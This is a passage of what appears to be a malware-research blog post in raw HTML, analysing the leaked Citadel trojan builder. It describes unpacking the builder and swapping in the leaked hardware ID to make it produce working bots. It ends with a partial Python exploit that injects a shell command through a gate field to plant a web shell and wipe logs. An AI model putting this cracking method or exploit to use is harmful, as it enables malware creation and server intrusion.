href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQPIMXym94zsvy0YNkkCbQUfXCuyW2qKzbJRFj8YvrmjXlnW0R_XPa8sUb5RuL6iMXa0T_cJJyINpNmU6rJNgt1ycpFdtapX_O6oMHbzEZaoXPIdgS6BOhf7m8_rnTBYghUFLe2mXnT-0/s1600/27-12-2013+12-25-56.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="76" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQPIMXym94zsvy0YNkkCbQUfXCuyW2qKzbJRFj8YvrmjXlnW0R_XPa8sUb5RuL6iMXa0T_cJJyINpNmU6rJNgt1ycpFdtapX_O6oMHbzEZaoXPIdgS6BOhf7m8_rnTBYghUFLe2mXnT-0/s400/27-12-2013+12-25-56.png" width="400" /></a></div> <br /> Create task:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrvkxSRmGRLAHVf8FHJ9XP3WEcX65-agQtpzr8dUq_yg4bgD5qXMs6kPLc7AZ7Z3srpD5_1KP31E6uLyXcGXf_zyo_2s0tyeT8nBq4GcuH2K59hfhpyRTW2oRulqdNbLvYNpK3SCoodlo/s1600/27-12-2013+12-22-07.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrvkxSRmGRLAHVf8FHJ9XP3WEcX65-agQtpzr8dUq_yg4bgD5qXMs6kPLc7AZ7Z3srpD5_1KP31E6uLyXcGXf_zyo_2s0tyeT8nBq4GcuH2K59hfhpyRTW2oRulqdNbLvYNpK3SCoodlo/s400/27-12-2013+12-22-07.png" width="400" /></a></div> <br /> Task statistic:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLQjFFt3I2Epb5usVSVzEYlGrJzsJO83Rtktg8tdpsoyRVTTppDyNBuWnHZRrW3goES1YIV9OgfKj-KVpQULI7wolxosOo0dEn0Ii6xOWjcBnpYCJCCh53gSXarDoqggoLsVFpBIc1_Uo/s1600/27-12-2013+12-23-00.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="107" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLQjFFt3I2Epb5usVSVzEYlGrJzsJO83Rtktg8tdpsoyRVTTppDyNBuWnHZRrW3goES1YIV9OgfKj-KVpQULI7wolxosOo0dEn0Ii6xOWjcBnpYCJCCh53gSXarDoqggoLsVFpBIc1_Uo/s400/27-12-2013+12-23-00.png" width="400" /></a></div> <br />I haven't looked at a sample because i don't have it but sound very lame, like Plasma HTTP who grab everything without checking if there is already a double.https://www.xylibox.com/2014/01/jolly-roger-stealer.htmlnoreply@blogger.com (Steven K)1tag:blogger.com,1999:blog-5365964245877416061.post-5811297081097438185Tue, 31 Dec 2013 13:28:00 +00002013-12-31T14:28:52.337+01:00Backdoor.Citadel.BkCnctC1F20D2340B519056A7D89B7DF4B0FFFCitabCitadelCitadel 1.3.5.1Citadel 1.3.5.1 Remote Code ExecutionCitadel Hardware IDCitadel leakCracking CitadelHacktool.Citadel.BuilderRecently on a forum someone requested cbcs.exe (Citadel Backconnect Server)<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyYb2AuY7UJRqX5XJ7vzyJ-unafw2IhZUx3TIBKqAaCqctzWCS22mggcaB_DLCssPWnhXIiuatBZq6gyiYVScMkS9krtoG0byang2YSSLtVFauWcgJ1y64l8B7RUCuY9fXYwXbCUoNbGg/s1600/29-12-2013+17-51-47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyYb2AuY7UJRqX5XJ7vzyJ-unafw2IhZUx3TIBKqAaCqctzWCS22mggcaB_DLCssPWnhXIiuatBZq6gyiYVScMkS9krtoG0byang2YSSLtVFauWcgJ1y64l8B7RUCuY9fXYwXbCUoNbGg/s400/29-12-2013+17-51-47.png" width="400" /></a></div> If you want to read more about the Backconnect on Citadel, the link that g4m372 shared is cool: <a href="http://laboratoriomalware.blogspot.de/2012/12/troyan-citadel-backconnect-windows.html">http://laboratoriomalware.blogspot.de/2012/12/troyan-citadel-backconnect-windows.html</a><br /> <br /> I've searched this file thought downloading a random mirror of the Citadel leaked package in hope to find it inside.<br /> <div class="separator" style="clear: both; text-align: center;"> </div> Finally the file wasn't on the leaked archive but was already grabbed by various malware trackers.<br /> MD5: <a href="http://vxvault.siri-urz.net/ViriList.php?MD5=50a59e805eeb228d44f6c08e4b786d1e">50A59E805EEB228D44F6C08E4B786D1E</a><br /> Malwarebytes: Backdoor.Citadel.BkCnct<br /> <br /> And since i've downloaded the leaked Citadel package... let's see about the Builder.<br /> It can be interesting to make a post about it.<br /> <br /> Citadel.exe: a33fb3c7884050642202e39cd7f177e0<br /> Malwarebytes: Hacktool.Citadel.Builder<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4SdNffd8_9lnaTUxWr6fllT0E65UtZ2HJMWtn-5ww1QTTGUqAqwd4t55QE2ZwHZphwIsvFoWSFwtvq_xrsk_biH3i8D81Z_ceeywEsK51W-xGz7pLzpKUJi3xRdbEJZHS68p0Rdz-SWg/s1600/29-12-2013+18-08-59.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="306" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4SdNffd8_9lnaTUxWr6fllT0E65UtZ2HJMWtn-5ww1QTTGUqAqwd4t55QE2ZwHZphwIsvFoWSFwtvq_xrsk_biH3i8D81Z_ceeywEsK51W-xGz7pLzpKUJi3xRdbEJZHS68p0Rdz-SWg/s400/29-12-2013+18-08-59.png" width="400" /></a></div> "ERROR: Builder has been moved to another PC or virtual environment, now it is deactivated."<br /> <br /> This file is packed with UPX:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOxZwxHcO3GcmdaJ5YPLDJCbdNA8JiXYBTUd7c-aYcTrhoI9cY9n1_pBBJxBGvffI19eO4hgWcoAuCEA-yk0qZ_eCYfSIlQ2wWBckPORczowJMHdxCARPJGEDysn1257gH4u4Raucogac/s1600/23-12-2013+00-56-02.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="222" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOxZwxHcO3GcmdaJ5YPLDJCbdNA8JiXYBTUd7c-aYcTrhoI9cY9n1_pBBJxBGvffI19eO4hgWcoAuCEA-yk0qZ_eCYfSIlQ2wWBckPORczowJMHdxCARPJGEDysn1257gH4u4Raucogac/s400/23-12-2013+00-56-02.png" width="400" /></a></div> <br /> Same for the Citadel Backconnect Server and the Hardware ID generator.<br /> But when we try to unpack it via UPX we have an exception:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_oD2f3-JpH2q9u1WsFogxTvWigrCDzGszVYZ7apckh9b-K6UlquAhwFrW0xBge3ExsGrbDsRuLAJzZKIogShNQCSU5KTV0XcFzps_HPeWmGW2vNPPPpcQtCBDHJZro_S1ppJb8tLPs3o/s1600/29-12-2013+18-11-37.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="96" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_oD2f3-JpH2q9u1WsFogxTvWigrCDzGszVYZ7apckh9b-K6UlquAhwFrW0xBge3ExsGrbDsRuLAJzZKIogShNQCSU5KTV0XcFzps_HPeWmGW2vNPPPpcQtCBDHJZro_S1ppJb8tLPs3o/s400/29-12-2013+18-11-37.png" width="400" /></a></div> <br /> UPX told us that there is something wrong with the file header, aquabox used a lame trick.<br /> With an hexadecimal editor we can clearly see that there is a problem with the DOS Header:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjomAmmijYZlZYYxprcGwIdfx1SIEvR0wzNeeOZDUWo0-pJY8HWh31Xu7a_E1OcehXoC7SVBvSOz9B8DClhwAvVZbVN4mQGE2UWXfJh8H4UikElSG5i59OzO8Gf8EnMdn9-6MUEUIUR9r4/s1600/29-12-2013+18-14-36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjomAmmijYZlZYYxprcGwIdfx1SIEvR0wzNeeOZDUWo0-pJY8HWh31Xu7a_E1OcehXoC7SVBvSOz9B8DClhwAvVZbVN4mQGE2UWXfJh8H4UikElSG5i59OzO8Gf8EnMdn9-6MUEUIUR9r4/s400/29-12-2013+18-14-36.png" width="400" /></a></div> <br /> We have 0x4D 0x5A ... 00 ... and a size of 0xE8 for the memory.<br /> <a href="http://pe101.corkami.com/">e_lfanew</a> is null, so let's fix it at 18h by 0x40<br /> Miracle:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXJV0syMrng48Ei_M9BDH3rGbGA87Crz8M1Y1-gNkBWqzSK3XISQ_FlTXJzuGO_VbbMup5pY_hc0Bwke1dfHPBQ16HELw0Sc0YCChEv3NbptuPy4v0q3kpsaQEKy_7xGsa2uJJQ7oA6as/s1600/29-12-2013+18-23-57.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="117" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXJV0syMrng48Ei_M9BDH3rGbGA87Crz8M1Y1-gNkBWqzSK3XISQ_FlTXJzuGO_VbbMup5pY_hc0Bwke1dfHPBQ16HELw0Sc0YCChEv3NbptuPy4v0q3kpsaQEKy_7xGsa2uJJQ7oA6as/s400/29-12-2013+18-23-57.png" width="400" /></a></div> <br /> Same tricks for the Hardware ID Calculator and the Citadel Backconnect Server, i will get back on these two files later.<br /> Now that we have a clear code we can know the Time/Date Stamp, view the ressources, but more interesting: see how Citadel is protected<br /> <br /> Viewing the strings already give us a good insight:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg10TU-4uHcdzXNkwRIM6zGy_WB3aOchb1Wv0P1Bj-EwTVJ2H3E_jnZMUjyg4wIP-kdYVSb6ipJS_Tr_dQaFxb1JnJyZbONUKFmWnN1IkqRDRT2EmLpyhEWoMaO6sctAMKTWkqDhPxgaWQ/s1600/29-12-2013+18-29-14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="165" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg10TU-4uHcdzXNkwRIM6zGy_WB3aOchb1Wv0P1Bj-EwTVJ2H3E_jnZMUjyg4wIP-kdYVSb6ipJS_Tr_dQaFxb1JnJyZbONUKFmWnN1IkqRDRT2EmLpyhEWoMaO6sctAMKTWkqDhPxgaWQ/s400/29-12-2013+18-29-14.png" width="400" /></a></div> PHYSICALDRIVE0, Win32_BIOS, Win32_Processor, SerialNumber...<br /> <br /> But we don't even really need to waste time trying to know how the generation is made.<br /> Although you can put a breakpoint at the beginning of the calculation procedure (0x4013F2)<br /> At the end, you will be here, this routine will finalise your HID:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirU5rcuoDpaazLKZEeUMCgc2xssokCF98-g0VTFnTHxj3sAy4HuSJmYpYY7fccJD4qRwcZCRdrdNcNTCHvcQISOmGu08C-exmIUw7hl-v22CzszV0wn2j2IYKT3Qby4TO-ChOVyVTxvfE/s1600/29-12-2013+18-43-16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirU5rcuoDpaazLKZEeUMCgc2xssokCF98-g0VTFnTHxj3sAy4HuSJmYpYY7fccJD4qRwcZCRdrdNcNTCHvcQISOmGu08C-exmIUw7hl-v22CzszV0wn2j2IYKT3Qby4TO-ChOVyVTxvfE/s400/29-12-2013+18-43-16.png" width="400" /></a></div> <br /> From another side, you can also have a look on the Hardware ID Calculator.<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLPOZ4EL_WixHubhswyuWqWmdX3ijJVx4OETwxqA5kDEy04ulEUnoKn0jueVvdAaC3gd2hGoslGrNvRFN4doYww_1OFkHfKejdxBDjOVBwDTgz4K1AQ5nqIoNQyYcODeHz9_fl4O-ZysM/s1600/29-12-2013+18-48-42.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLPOZ4EL_WixHubhswyuWqWmdX3ijJVx4OETwxqA5kDEy04ulEUnoKn0jueVvdAaC3gd2hGoslGrNvRFN4doYww_1OFkHfKejdxBDjOVBwDTgz4K1AQ5nqIoNQyYcODeHz9_fl4O-ZysM/s1600/29-12-2013+18-48-42.png" /></a></div> <br />I've got a problem with this file, the first layer was a SFX archive:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX0oWBI2HBDl1fYHGgKQpEBnn0EnqMiRg706uHLRiE5VGvgePZ8pCMuoi6ZyEB1Kg4JY2Nk0sh67xTOVKfROv-mmN7mgY7dTVnIgZ5NPlxKFJgoBR-J5lMZ64qRuq8I9BH0zlbd4CzjMM/s1600/29-12-2013+19-02-08.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="202" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhX0oWBI2HBDl1fYHGgKQpEBnn0EnqMiRg706uHLRiE5VGvgePZ8pCMuoi6ZyEB1Kg4JY2Nk0sh67xTOVKfROv-mmN7mgY7dTVnIgZ5NPlxKFJgoBR-J5lMZ64qRuq8I9BH0zlbd4CzjMM/s400/29-12-2013+19-02-08.png" width="400" /></a></div> <br /> Malware embedded (stealer):<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiazy6RRxkMvCv9ptkg8D9A9uBUvbbChfFMuNlUkBy9jOU3H5Nr0wLDdp6dT-dACJQShXqEdKABmcWnKbvuEHrPOlqmmhZjbCw99z0ie7yN274RIvR6hZ-1kIPWf7Dt6Ol_XOhHkAR_Omc/s1600/29-12-2013+19-04-07.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="233" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiazy6RRxkMvCv9ptkg8D9A9uBUvbbChfFMuNlUkBy9jOU3H5Nr0wLDdp6dT-dACJQShXqEdKABmcWnKbvuEHrPOlqmmhZjbCw99z0ie7yN274RIvR6hZ-1kIPWf7Dt6Ol_XOhHkAR_Omc/s320/29-12-2013+19-04-07.png" width="320" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVol9s-Q7feDxPIfZmHgsMOmMmYS-RKG5URh-XVPJjDeXJXOg4gaXlslGlINsqw3g_nw2PJAjj0Ns8Q3kT6Qf_ak3xhFRDFwSgptYzaO-2t0NDPFe0s0UIX0JiK5XOqSKAQeXNufXJ17g/s1600/29-12-2013+19-06-57.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVol9s-Q7feDxPIfZmHgsMOmMmYS-RKG5URh-XVPJjDeXJXOg4gaXlslGlINsqw3g_nw2PJAjj0Ns8Q3kT6Qf_ak3xhFRDFwSgptYzaO-2t0NDPFe0s0UIX0JiK5XOqSKAQeXNufXJ17g/s400/29-12-2013+19-06-57.png" width="400" /></a></div> <br /> Conclusion: Don't rush on leaked stuff.<br /> <br /> Alright, now that you have extracted/unpacked the good HID Calculator you can open it in olly.<br /> The code is exactly the same as the one you can find on the Citadel Builder, it may help to locate the calculation procedure on the builder although it's really easy to locate it.<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKLq5wDgygxNmRaRAQxVXpXs7CLgx4GFqidjf75PrqHSHNsS9piij5okXt-9P-nCeq_1umb1OYt_JJz2lxTllQaq8g2eKKcPc_xyE4k0TeaO6XhHoeZYmjdl_xWPn3Gg4nbXMKWURf5BQ/s1600/29-12-2013+19-14-56.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKLq5wDgygxNmRaRAQxVXpXs7CLgx4GFqidjf75PrqHSHNsS9piij5okXt-9P-nCeq_1umb1OYt_JJz2lxTllQaq8g2eKKcPc_xyE4k0TeaO6XhHoeZYmjdl_xWPn3Gg4nbXMKWURf5BQ/s400/29-12-2013+19-14-56.png" width="400" /></a></div> <br /> That was just a short parentheses, to get back on the builder, after that the generation end you will have multiple occasions to view your HID on the stack like here:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPEZ8zRDcX1Kt-U-JsYXiek8KJxks8pco03dAoI1nOPtXzD7S_DaslF03xAyrf7PgA9DCqLIN9W5qxpTPt30FVlsV3L-ZK2_6BFfR9Pm-POQmo5Uqjl8bkDp9obu4jYlaDkBKJJG3_fEM/s1600/29-12-2013+19-24-34.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="78" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPEZ8zRDcX1Kt-U-JsYXiek8KJxks8pco03dAoI1nOPtXzD7S_DaslF03xAyrf7PgA9DCqLIN9W5qxpTPt30FVlsV3L-ZK2_6BFfR9Pm-POQmo5Uqjl8bkDp9obu4jYlaDkBKJJG3_fEM/s400/29-12-2013+19-24-34.png" width="400" /></a></div> And the crutial part start here.<br /> <br /> When the Citadel package of Citab got leaked (<a href="http://www.xylibox.com/2013/06/citadel-lawsuit-and-explanation-of-john.html">see this article for more information</a>) an important file was also released:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBBzZyFLEOrjIBjMq25oknUevjMYYcG9r-3nc4sUOip-qztA8Ku4tFx3VPrn-0T6fY2PQSQaESAGpPX4bJISyOyBzfDN93McGJgZegY2WmhzUEvE1MRpwlk0DBTqgqcgcWZdcQe7jECsw/s1600/29-12-2013+19-32-23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBBzZyFLEOrjIBjMq25oknUevjMYYcG9r-3nc4sUOip-qztA8Ku4tFx3VPrn-0T6fY2PQSQaESAGpPX4bJISyOyBzfDN93McGJgZegY2WmhzUEvE1MRpwlk0DBTqgqcgcWZdcQe7jECsw/s1600/29-12-2013+19-32-23.png" /></a></div> <br /> The HID of the original machine who was running the builder, so you just have to replace your HID by this one, just like this:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguJbG6EI788om3XsthnSs_VYt6UWgjSWCemTbQEZbvACufBM7LRvukR4OyRAWA7YV6VTW3khaH58m4DsvoiGB_qaQ91AjG-8vK6WI9zmgcQqjci8IN659HqJbb5c_gaH5uiAVd7laU2M0/s1600/29-12-2013+19-36-14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguJbG6EI788om3XsthnSs_VYt6UWgjSWCemTbQEZbvACufBM7LRvukR4OyRAWA7YV6VTW3khaH58m4DsvoiGB_qaQ91AjG-8vK6WI9zmgcQqjci8IN659HqJbb5c_gaH5uiAVd7laU2M0/s400/29-12-2013+19-36-14.png" width="400" /></a></div> <br /> And this is how the protection of Citadel become super weak and can generate working malwares<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzhqfUqBcjcri3Rfn-d14KhEBTXDxEmVJJgr9MJeozuiH8drPhWylBcmUo4On9Tgp77JmmLA77UUSvPWzeS7MUGIUajEceHOPVpJ6oKKuBLs_Mdt2Nc5BhxX-7PiomlB8rPVTzETodNLA/s1600/29-12-2013+19-38-04.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="263" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzhqfUqBcjcri3Rfn-d14KhEBTXDxEmVJJgr9MJeozuiH8drPhWylBcmUo4On9Tgp77JmmLA77UUSvPWzeS7MUGIUajEceHOPVpJ6oKKuBLs_Mdt2Nc5BhxX-7PiomlB8rPVTzETodNLA/s400/29-12-2013+19-38-04.png" width="400" /></a></div> Now you just have to do a codecave or inject a dll in order to modify it permanently, child game.<br /> <br /> The problem that every crackers was facing on leaked Citadel builders is to find the good HID key.<br /> Citadel builders who was previously leaked wasn't leaked with HID key. <br /> e.g: vortex1772_second - 1.3.5.1<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_aTk7VW_-2JNZxtGzACl_FuvgiQ9_iMw7TZoQwlAlrPzmRU0kgezJ9tNr4ZMcnKbLMNwzVLEU6YoxxvqBdnCaElPN2SlheUHsn-sw7dWbf3q3d8j0zmd0MJV9wEG8OmX_xb8K-k3EBlg/s1600/dK6XvLF.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="306" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_aTk7VW_-2JNZxtGzACl_FuvgiQ9_iMw7TZoQwlAlrPzmRU0kgezJ9tNr4ZMcnKbLMNwzVLEU6YoxxvqBdnCaElPN2SlheUHsn-sw7dWbf3q3d8j0zmd0MJV9wEG8OmX_xb8K-k3EBlg/s400/dK6XvLF.png" width="400" /></a></div> <br /> And you can't just 'force' the procedure to generate a bot because the Citadel stub is encrypted inside, that why when the package got leaked with the correct HID, a easy way to crack the builder appeared.<br /> Without having the good HID you can still bruteforce it till you break the key but this is much harder and time wasting, this solution would be also a more great achievement and respected in scene release.<br /> <br /> To finish, let's get back on the Citadel backconnect server who was requested on kernelmode.info <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhONOanrUhlqlSgTY3BUyk4BZso9xDagiCQ85eJOokRJVfuvzyzxeCg5cDqa3IH8qRand4hZ6B7NM1AZ0GRheResFu79KRKshm-Yic0X_Ye5A_byUozRk56QO9O6k8YleNBrUaSelhZKag/s1600/30-12-2013+01-47-30.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="197" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhONOanrUhlqlSgTY3BUyk4BZso9xDagiCQ85eJOokRJVfuvzyzxeCg5cDqa3IH8qRand4hZ6B7NM1AZ0GRheResFu79KRKshm-Yic0X_Ye5A_byUozRk56QO9O6k8YleNBrUaSelhZKag/s400/30-12-2013+01-47-30.png" width="400" /></a></div> <br /> This script was also leaked with the Citab package:<br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpcNtqT7SzYEKYsFT_Ph9qbsQRcW3Kfr4tH1roAXped2UNkkOgZ65BXN3mxhDJlzfsKC-ZytXpq5OgoLYn2go21iTFmi_u3rb_pElq-GGG4ciJ8eRcMzMyiTgVVHykAP3fyVmO-hiOeJE/s1600/30-12-2013+01-49-29.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpcNtqT7SzYEKYsFT_Ph9qbsQRcW3Kfr4tH1roAXped2UNkkOgZ65BXN3mxhDJlzfsKC-ZytXpq5OgoLYn2go21iTFmi_u3rb_pElq-GGG4ciJ8eRcMzMyiTgVVHykAP3fyVmO-hiOeJE/s400/30-12-2013+01-49-29.png" width="400" /></a></div> <br /> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7VtNgg_1cQaqaTyHKRMDUgzIq1-gEN38iHJEsYn4F68FkCMD5AAOcPNcSCwT3Qyfj3zFJhAQH1wKowbbKuiMsVoDGDsMvhJlKHh_FVwELJg2LNIgcTTXUqixZLqn5vcZ1oGft5dGQ9Ns/s1600/31-12-2013+14-08-54.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7VtNgg_1cQaqaTyHKRMDUgzIq1-gEN38iHJEsYn4F68FkCMD5AAOcPNcSCwT3Qyfj3zFJhAQH1wKowbbKuiMsVoDGDsMvhJlKHh_FVwELJg2LNIgcTTXUqixZLqn5vcZ1oGft5dGQ9Ns/s1600/31-12-2013+14-08-54.jpg" /></a></div> <br /> It's for Windows box, and it's super secure... oh wait..<br /> <div class="python" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"> <span style="color: #ff7700; font-weight: bold;">import</span> <span style="color: crimson;">urllib</span><br /> <span style="color: #ff7700; font-weight: bold;">import</span> <span style="color: crimson;">urllib2</span><br /> <br /> <span style="color: #ff7700; font-weight: bold;">def</span> request<span style="color: black;">(</span>url, params=<span style="color: green;">None</span>, method=<span style="color: darkslateblue;">'GET'</span><span style="color: black;">)</span>:<br /> &nbsp; &nbsp; <span style="color: #ff7700; font-weight: bold;">if</span> method == <span style="color: darkslateblue;">'POST'</span>:<br /> &nbsp; &nbsp; &nbsp; &nbsp; <span style="color: crimson;">urllib2</span>.<span style="color: black;">urlopen</span><span style="color: black;">(</span>url, <span style="color: crimson;">urllib</span>.<span style="color: black;">urlencode</span><span style="color: black;">(</span>params<span style="color: black;">)</span><span style="color: black;">)</span>.<span style="color: black;">read</span><span style="color: black;">(</span><span style="color: black;">)</span><br /> &nbsp; &nbsp; <span style="color: #ff7700; font-weight: bold;">elif</span> method == <span style="color: darkslateblue;">'GET'</span>:<br /> &nbsp; &nbsp; &nbsp; &nbsp; <span style="color: #ff7700; font-weight: bold;">if</span> params == <span style="color: green;">None</span>:<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span style="color: crimson;">urllib2</span>.<span style="color: black;">urlopen</span><span style="color: black;">(</span>url<span style="color: black;">)</span><br /> &nbsp; &nbsp; &nbsp; &nbsp; <span style="color: #ff7700; font-weight: bold;">else</span>:<br /> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span style="color: crimson;">urllib2</span>.<span style="color: black;">urlopen</span><span style="color: black;">(</span>url + <span style="color: darkslateblue;">'?'</span> + <span style="color: crimson;">urllib</span>.<span style="color: black;">urlencode</span><span style="color: black;">(</span>params<span style="color: black;">)</span><span style="color: black;">)</span>.<span style="color: black;">read</span><span style="color: black;">(</span><span style="color: black;">)</span><br /> <br /> <span style="color: #ff7700; font-weight: bold;">def</span> uploadShell<span style="color: black;">(</span>url, filename, payload<span style="color: black;">)</span>:<br /> &nbsp; &nbsp; data = <span style="color: black;">{</span><br /> &nbsp; &nbsp; &nbsp; &nbsp; <span style="color: darkslateblue;">'b'</span> &nbsp;: <span style="color: darkslateblue;">'tapz'</span>,<br /> &nbsp; &nbsp; &nbsp; &nbsp; <span style="color: darkslateblue;">'p1'</span> : <span style="color: darkslateblue;">'faggot'</span>,<br /> &nbsp; &nbsp; &nbsp; &nbsp; <span style="color: darkslateblue;">'p2'</span> : <span style="color: darkslateblue;">'hacker | echo "'</span> + payload + <span style="color: darkslateblue;">'" &gt;&gt; '</span> + filename<br /> &nbsp; &nbsp; <span style="color: black;">}</span><br /> &nbsp; &nbsp; request<span style="color: black;">(</span>url + <span style="color: darkslateblue;">'test.php'</span>, data<span style="color: black;">)</span><br /> <br /> <span style="color: #ff7700; font-weight: bold;">def</span> shellExists<span style="color: black;">(</span>url<span style="color: black;">)</span>:<br /> &nbsp; &nbsp; <span style="color: #ff7700; font-weight: bold;">return</span> <span style="color: crimson;">urllib</span>.<span style="color: black;">urlopen</span><span style="color: black;">(</span>url<span style="color: black;">)</span>.<span style="color: black;">getcode</span><span style="color: black;">(</span><span style="color: black;">)</span> == <span style="color: orangered;">200</span><br /> &nbsp; &nbsp; <br /> <span style="color: #ff7700; font-weight: bold;">def</span> cleanLogs<span style="color: black;">(</span>url<span style="color: black;">)</span>:<br /> &nbsp; &nbsp; delete = <span style="color: black;">{</span><br /> &nbsp; &nbsp; &nbsp; &nbsp; <span style="color: darkslateblue;">'delete'</span> : <span style="color: darkslateblue;">''</span><br /> &nbsp; &nbsp; <span style="color: black;">}</span><br /> &nbsp; &nbsp; request<span style="color: black;">(</span>URL + <span style="color: darkslateblue;">'control.php'</span>, delete, <span style="color: darkslateblue;">'POST'</span><span style="color: black;">)</span><br /> <br /> URL &nbsp; &nbsp; &nbsp;= <span style="color: darkslateblue;">'http://localhost/citadel/winserv_php_gate/'</span><br /> FILENAME = <span style="color: 